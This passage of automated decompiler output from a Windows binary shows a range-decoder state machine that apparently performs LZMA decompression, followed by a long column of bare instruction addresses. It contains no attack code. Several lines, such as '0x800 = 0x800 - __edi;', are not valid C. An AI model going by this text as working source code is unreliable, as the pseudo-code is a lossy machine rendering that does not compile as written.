								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                                                    0x00000000
                                                    0x004070ab
                                                    0x004070ab
                                                    0x004070af
                                                    0x00407166
                                                    0x00407169
                                                    0x00407175
                                                    0x00407056
                                                    0x00407056
                                                    0x00407059
                                                    0x004073cb
                                                    0x004073cb
                                                    0x004073ce
                                                    0x004073ce
                                                    0x004073d4
                                                    0x004073da
                                                    0x004073e0
                                                    0x004073fa
                                                    0x004073fd
                                                    0x00407403
                                                    0x0040740e
                                                    0x00407410
                                                    0x004073e2
                                                    0x004073e2
                                                    0x004073f1
                                                    0x004073f5
                                                    0x004073f5
                                                    0x0040741a
                                                    0x00407441
                                                    0x00407441
                                                    0x00407447
                                                    0x00407447
                                                    0x00000000
                                                    0x0040741c
                                                    0x0040741c
                                                    0x00407420
                                                    0x004075cf
                                                    0x00000000
                                                    0x004075cf
                                                    0x0040742c
                                                    0x00407433
                                                    0x0040743b
                                                    0x0040743e
                                                    0x00000000
                                                    0x0040743e
                                                    0x004070b5
                                                    0x004070b9
                                                    0x004075fa
                                                    0x004075fa
                                                    0x004075fd
                                                    0x00407601
                                                    0x00407601
                                                    0x004070bf
                                                    0x004070c5
                                                    0x004070c8
                                                    0x004070cc
                                                    0x004070cf
                                                    0x004070d3
                                                    0x00407599
                                                    0x004075e5
                                                    0x004075ed
                                                    0x004075f4
                                                    0x004075f6
                                                    0x00000000
                                                    0x004075f6
                                                    0x004070d9
                                                    0x004070dc
                                                    0x004070e2
                                                    0x004070e4
                                                    0x004070e4
                                                    0x004070e7
                                                    0x004070ea
                                                    0x004070ed
                                                    0x004070f0
                                                    0x004070f3
                                                    0x004070f6
                                                    0x004070f7
                                                    0x004070f9
                                                    0x004070f9
                                                    0x004070f9
                                                    0x004070fc
                                                    0x004070ff
                                                    0x00407102
                                                    0x00407105
                                                    0x00407105
                                                    0x00407108
                                                    0x0040710a
                                                    0x0040710a
                                                    0x0040710d
                                                    0x0040710d
                                                    0x0040710d
                                                    0x00406be3
                                                    0x00406be3
                                                    0x00406bec
                                                    0x00000000
                                                    0x00000000
                                                    0x00406bf2
                                                    0x00000000
                                                    0x00406bfd
                                                    0x00000000
                                                    0x00000000
                                                    0x00406c06
                                                    0x00406c09
                                                    0x00406c0c
                                                    0x00406c10
                                                    0x00000000
                                                    0x00000000
                                                    0x00406c16
                                                    0x00406c19
                                                    0x00406c1b
                                                    0x00406c1c
                                                    0x00406c1f
                                                    0x00406c21
                                                    0x00406c22
                                                    0x00406c24
                                                    0x00406c27
                                                    0x00406c2c
                                                    0x00406c31
                                                    0x00406c3a
                                                    0x00406c4d
                                                    0x00406c50
                                                    0x00406c5c
                                                    0x00406c84
                                                    0x00406c86
                                                    0x00406c94
                                                    0x00406c94
                                                    0x00406c98
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00406c88
                                                    0x00406c88
                                                    0x00406c8b
                                                    0x00406c8c
                                                    0x00406c8c
                                                    0x00000000
                                                    0x00406c88
                                                    0x00406c62
                                                    0x00406c67
                                                    0x00406c67
                                                    0x00406c70
                                                    0x00406c78
                                                    0x00406c7b
                                                    0x00000000
                                                    0x00406c81
                                                    0x00406c81
                                                    0x00000000
                                                    0x00406c81
                                                    0x00000000
                                                    0x00406c9e
                                                    0x00406c9e
                                                    0x00406ca2
                                                    0x0040754e
                                                    0x00000000
                                                    0x0040754e
                                                    0x00406cab
                                                    0x00406cbb
                                                    0x00406cbe
                                                    0x00406cc1
                                                    0x00406cc1
                                                    0x00406cc1
                                                    0x00406cc4
                                                    0x00406cc8
                                                    0x00000000
                                                    0x00000000
                                                    0x00406cca
                                                    0x00406cd0
                                                    0x00406cfa
                                                    0x00406d00
                                                    0x00406d07
                                                    0x00000000
                                                    0x00406d07
                                                    0x00406cd6
                                                    0x00406cd9
                                                    0x00406cde
                                                    0x00406cde
                                                    0x00406ce9
                                                    0x00406cf1
                                                    0x00406cf4
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00406d39
                                                    0x00406d3f
                                                    0x00406d42
                                                    0x00406d4f
                                                    0x00406d57
                                                    0x00000000
                                                    0x00000000
                                                    0x00406d0e
                                                    0x00406d0e
                                                    0x00406d12
                                                    0x0040755d
                                                    0x00000000
                                                    0x0040755d
                                                    0x00406d1e
                                                    0x00406d29
                                                    0x00406d29
                                                    0x00406d29
                                                    0x00406d2c
                                                    0x00406d2f
                                                    0x00406d32
                                                    0x00406d37
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00406d5f
                                                    0x00406d61
                                                    0x00406d64
                                                    0x00406dd5
                                                    0x00406dd8
                                                    0x00406ddb
                                                    0x00406de2
                                                    0x00406dec
                                                    0x00000000
                                                    0x00406dec
                                                    0x00406d66
                                                    0x00406d6a
                                                    0x00406d6d
                                                    0x00406d6f
                                                    0x00406d72
                                                    0x00406d75
                                                    0x00406d77
                                                    0x00406d7a
                                                    0x00406d7c
                                                    0x00406d81
                                                    0x00406d84
                                                    0x00406d87
                                                    0x00406d8b
                                                    0x00406d92
                                                    0x00406d95
                                                    0x00406d9c
                                                    0x00406da0
                                                    0x00406da8
                                                    0x00406da8
                                                    0x00406da8
                                                    0x00406da2
                                                    0x00406da2
                                                    0x00406da2
                                                    0x00406d97
                                                    0x00406d97
                                                    0x00406d97
                                                    0x00406dac
                                                    0x00406daf
                                                    0x00406dcd
                                                    0x00406dcf
                                                    0x00000000
                                                    0x00406db1
                                                    0x00406db1
                                                    0x00406db4
                                                    0x00406db7
                                                    0x00406dba
                                                    0x00406dbc
                                                    0x00406dbc
                                                    0x00406dbc
                                                    0x00406dbf
                                                    0x00406dc2
                                                    0x00406dc4
                                                    0x00406dc5
                                                    0x00406dc8
                                                    0x00000000
                                                    0x00406dc8
                                                    0x00000000
                                                    0x00406ffe
                                                    0x00407002
                                                    0x00407020
                                                    0x00407023
                                                    0x0040702a
                                                    0x0040702d
                                                    0x00407030
                                                    0x00407033
                                                    0x00407036
                                                    0x00407039
                                                    0x0040703b
                                                    0x00407042
                                                    0x00407043
                                                    0x00407045
                                                    0x00407048
                                                    0x0040704b
                                                    0x0040704e
                                                    0x0040704e
                                                    0x00407053
                                                    0x00000000
                                                    0x00407053
                                                    0x00407004
                                                    0x00407007
                                                    0x0040700a
                                                    0x00407014
                                                    0x00000000
                                                    0x00000000
                                                    0x00407068
                                                    0x0040706c
                                                    0x0040708f
                                                    0x00407092
                                                    0x00407095
                                                    0x0040709f
                                                    0x0040706e
                                                    0x0040706e
                                                    0x00407071
                                                    0x00407074
                                                    0x00407077
                                                    0x00407084
                                                    0x00407087
                                                    0x00407087
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0040711c
                                                    0x00407120
                                                    0x00407127
                                                    0x0040712a
                                                    0x0040712d
                                                    0x00407137
                                                    0x00000000
                                                    0x00407137
                                                    0x00407122
                                                    0x00000000
                                                    0x00000000
                                                    0x00407143
                                                    0x00407147
                                                    0x0040714e
                                                    0x00407151
                                                    0x00407154
                                                    0x00407149
                                                    0x00407149
                                                    0x00407149
                                                    0x00407157
                                                    0x0040715a
                                                    0x0040715d
                                                    0x0040715d
                                                    0x00407160
                                                    0x00407163
                                                    0x00000000
                                                    0x00000000
                                                    0x00407203
                                                    0x00407203
                                                    0x00407207
                                                    0x004075a5
                                                    0x00000000
                                                    0x004075a5
                                                    0x0040720d
                                                    0x00407210
                                                    0x00407213
                                                    0x00407217
                                                    0x0040721a
                                                    0x00407220
                                                    0x00407222
                                                    0x00407222
                                                    0x00407222
                                                    0x00407225
                                                    0x00407228
                                                    0x00000000
                                                    0x00000000
                                                    0x00406df8
                                                    0x00406df8
                                                    0x00406dfc
                                                    0x00407569
                                                    0x00000000
                                                    0x00407569
                                                    0x00406e02
                                                    0x00406e05
                                                    0x00406e08
                                                    0x00406e0c
                                                    0x00406e0f
                                                    0x00406e15
                                                    0x00406e17
                                                    0x00406e17
                                                    0x00406e17
                                                    0x00406e1a
                                                    0x00406e1d
                                                    0x00406e1d
                                                    0x00406e20
                                                    0x00406e23
                                                    0x00000000
                                                    0x00000000
                                                    0x00406e29
                                                    0x00406e2f
                                                    0x00000000
                                                    0x00000000
                                                    0x00406e35
                                                    0x00406e35
                                                    0x00406e39
                                                    0x00406e3c
                                                    0x00406e3f
                                                    0x00406e42
                                                    0x00406e45
                                                    0x00406e46
                                                    0x00406e49
                                                    0x00406e4b
                                                    0x00406e51
                                                    0x00406e54
                                                    0x00406e57
                                                    0x00406e5a
                                                    0x00406e5d
                                                    0x00406e60
                                                    0x00406e63
                                                    0x00406e7f
                                                    0x00406e82
                                                    0x00406e85
                                                    0x00406e88
                                                    0x00406e8f
                                                    0x00406e93
                                                    0x00406e95
                                                    0x00406e99
                                                    0x00406e65
                                                    0x00406e65
                                                    0x00406e69
                                                    0x00406e71
                                                    0x00406e76
                                                    0x00406e78
                                                    0x00406e7a
                                                    0x00406e7a
                                                    0x00406e9c
                                                    0x00406ea3
                                                    0x00406ea6
                                                    0x00000000
                                                    0x00406eac
                                                    0x00000000
                                                    0x00406eac
                                                    0x00000000
                                                    0x00406eb1
                                                    0x00406eb1
                                                    0x00406eb5
                                                    0x00407575
                                                    0x00000000
                                                    0x00407575
                                                    0x00406ebb
                                                    0x00406ebe
                                                    0x00406ec1
                                                    0x00406ec5
                                                    0x00406ec8
                                                    0x00406ece
                                                    0x00406ed0
                                                    0x00406ed0
                                                    0x00406ed0
                                                    0x00406ed3
                                                    0x00406ed6
                                                    0x00406ed6
                                                    0x00406ed6
                                                    0x00406edc
                                                    0x00000000
                                                    0x00000000
                                                    0x00406ede
                                                    0x00406ee1
                                                    0x00406ee4
                                                    0x00406ee7
                                                    0x00406eea
                                                    0x00406eed
                                                    0x00406ef0
                                                    0x00406ef3
                                                    0x00406ef6
                                                    0x00406ef9
                                                    0x00406efc
                                                    0x00406f14
                                                    0x00406f17
                                                    0x00406f1a
                                                    0x00406f1d
                                                    0x00406f1d
                                                    0x00406f20
                                                    0x00406f24
                                                    0x00406f26
                                                    0x00406efe
                                                    0x00406efe
                                                    0x00406f06
                                                    0x00406f0b
                                                    0x00406f0d
                                                    0x00406f0f
                                                    0x00406f0f
                                                    0x00406f29
                                                    0x00406f30
                                                    0x00406f33
                                                    0x00000000
                                                    0x00406f35
                                                    0x00000000
                                                    0x00406f35
                                                    0x00406f33
                                                    0x00406f3a
                                                    0x00406f3a
                                                    0x00406f3a
                                                    0x00406f3a
                                                    0x00000000
                                                    0x00000000
                                                    0x00406f75
                                                    0x00406f75
                                                    0x00406f79
                                                    0x00407581
                                                    0x00000000
                                                    0x00407581
                                                    0x00406f7f
                                                    0x00406f82
                                                    0x00406f85
                                                    0x00406f89
                                                    0x00406f8c
                                                    0x00406f92
                                                    0x00406f94
                                                    0x00406f94
                                                    0x00406f94
                                                    0x00406f97
                                                    0x00406f9a
                                                    0x00406f9a
                                                    0x00406fa0
                                                    0x00406f3e
                                                    0x00406f3e
                                                    0x00406f41
                                                    0x00000000
                                                    0x00406f41
                                                    0x00406fa2
                                                    0x00406fa2
                                                    0x00406fa5
                                                    0x00406fa8
                                                    0x00406fab
                                                    0x00406fae
                                                    0x00406fb1
                                                    0x00406fb4
                                                    0x00406fb7
                                                    0x00406fba
                                                    0x00406fbd
                                                    0x00406fc0
                                                    0x00406fd8
                                                    0x00406fdb
                                                    0x00406fde
                                                    0x00406fe1
                                                    0x00406fe1
                                                    0x00406fe4
                                                    0x00406fe8
                                                    0x00406fea
                                                    0x00406fc2
                                                    0x00406fc2
                                                    0x00406fca
                                                    0x00406fcf
                                                    0x00406fd1
                                                    0x00406fd3
                                                    0x00406fd3
                                                    0x00406fed
                                                    0x00406ff4
                                                    0x00406ff7
                                                    0x00000000
                                                    0x00406ff9
                                                    0x00000000
                                                    0x00406ff9
                                                    0x00000000
                                                    0x00407286
                                                    0x00407286
                                                    0x0040728a
                                                    0x004075b1
                                                    0x00000000
                                                    0x004075b1
                                                    0x00407290
                                                    0x00407293
                                                    0x00407296
                                                    0x0040729a
                                                    0x0040729d
                                                    0x004072a3
                                                    0x004072a5
                                                    0x004072a5
                                                    0x004072a5
                                                    0x004072a8
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00407395
                                                    0x00407399
                                                    0x004073bb
                                                    0x004073be
                                                    0x004073c8
                                                    0x00000000
                                                    0x004073c8
                                                    0x0040739b
                                                    0x0040739e
                                                    0x004073a2
                                                    0x004073a5
                                                    0x004073a5
                                                    0x004073a8
                                                    0x00000000
                                                    0x00000000
                                                    0x00407452
                                                    0x00407456
                                                    0x00407474
                                                    0x00407474
                                                    0x00407474
                                                    0x0040747b
                                                    0x00407482
                                                    0x00407489
                                                    0x00407489
                                                    0x00000000
                                                    0x00407489
                                                    0x00407458
                                                    0x0040745b
                                                    0x0040745e
                                                    0x00407461
                                                    0x00407468
                                                    0x004073ac
                                                    0x004073ac
                                                    0x004073af
                                                    0x00000000
                                                    0x00000000
                                                    0x00407543
                                                    0x00407546
                                                    0x00000000
                                                    0x00000000
                                                    0x0040717d
                                                    0x0040717f
                                                    0x00407186
                                                    0x00407187
                                                    0x00407189
                                                    0x0040718c
                                                    0x00000000
                                                    0x00000000
                                                    0x00407194
                                                    0x00407197
                                                    0x0040719a
                                                    0x0040719c
                                                    0x0040719e
                                                    0x0040719e
                                                    0x0040719f
                                                    0x004071a2
                                                    0x004071a9
                                                    0x004071ac
                                                    0x004071ba
                                                    0x00000000
                                                    0x00000000
                                                    0x00407490
                                                    0x00407490
                                                    0x00407493
                                                    0x0040749a
                                                    0x00000000
                                                    0x00000000
                                                    0x0040749f
                                                    0x0040749f
                                                    0x004074a3
                                                    0x004075db
                                                    0x00000000
                                                    0x004075db
                                                    0x004074a9
                                                    0x004074ac
                                                    0x004074af
                                                    0x004074b3
                                                    0x004074b6
                                                    0x004074bc
                                                    0x004074be
                                                    0x004074be
                                                    0x004074be
                                                    0x004074c1
                                                    0x004074c4
                                                    0x004074c4
                                                    0x004074c4
                                                    0x004074c4
                                                    0x004074c7
                                                    0x004074c7
                                                    0x004074cb
                                                    0x0040752b
                                                    0x0040752e
                                                    0x00407533
                                                    0x00407534
                                                    0x00407536
                                                    0x00407538
                                                    0x0040753b
                                                    0x00000000
                                                    0x0040753b
                                                    0x004074cd
                                                    0x004074d3
                                                    0x004074d6
                                                    0x004074d9
                                                    0x004074dc
                                                    0x004074df
                                                    0x004074e2
                                                    0x004074e5
                                                    0x004074e8
                                                    0x004074eb
                                                    0x004074ee
                                                    0x00407507
                                                    0x0040750a
                                                    0x0040750d
                                                    0x00407510
                                                    0x00407514
                                                    0x00407516
                                                    0x00407516
                                                    0x00407517
                                                    0x0040751a
                                                    0x004074f0
                                                    0x004074f0
                                                    0x004074f8
